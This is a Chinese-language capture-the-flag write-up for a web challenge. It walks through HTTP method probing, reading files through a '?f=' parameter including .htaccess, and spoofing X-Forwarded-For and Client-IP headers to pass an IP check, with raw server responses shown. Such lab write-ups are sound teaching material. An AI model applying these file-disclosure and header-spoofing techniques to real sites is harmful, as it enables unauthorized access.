欢迎扫码关注微信公众号
这道题目考察的是HTTP的几种请求方法,当我们使用GET方法请求网站根目录时,会出现404错误,在返回页面中出现X-Method字段,值为haha,其实这就是在提示我们考虑请求方法,HTTP的请求方法一共就那么几种,我们挨个试,当试到OPTIONS方法的时候,出现了这个页面:
HTTP/1.1 302 Found
Server: nginx/1.10.2
Date: Mon, 24 Sep 2018 03:01:25 GMT
Content-Type: text/html
Content-Length: 220
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.19
Location: ?f=1.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /404.php was not found on this server.</p>
</body></html>Not allowed file
Location字段为我们指了一条明路,在网站根目录后加上?f=1.php,继续访问:
HTTP/1.1 302 Found
Server: nginx/1.10.2
Date: Mon, 24 Sep 2018 03:03:04 GMT
Content-Type: text/html
Content-Length: 79
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.19
Location: ?f=1.php
<?php
$msg = "not here";
$msg .= PHP_EOL;
$msg .="plz trying";
echo $msg;
改变参数,替换成index.php、flag.php,均无法访问
HTTP/1.1 302 Found
Server: nginx/1.10.2
Date: Mon, 24 Sep 2018 03:03:49 GMT
Content-Type: text/html
Content-Length: 16
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.19
Location: ?f=1.php
Not allowed file
在Appache搭建的网站中,根目录下存在.htaccess文件,我们尝试着访问一下:
HTTP/1.1 302 Found
Server: nginx/1.10.2
Date: Mon, 24 Sep 2018 03:04:58 GMT
Content-Type: text/html
Content-Length: 94
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.19
Location: ?f=1.php
RewriteEngine On
RewriteBase /
RewriteRule ^8d829d8568e46455104209db5cd9228d.html$ 404.php [L]
然后我们顺藤摸瓜,去访问8d829d8568e46455104209db5cd9228d.html
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Mon, 24 Sep 2018 03:05:48 GMT
Content-Type: text/html
Content-Length: 22
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.19
ip incorrect ???XFF???
提示说我们的客户IP不正确,去更改X-Forward-For字段的值,更改为本地客户127.0.0.1
结果还是不行,我们换另一个字段client-ip,成功得到flag
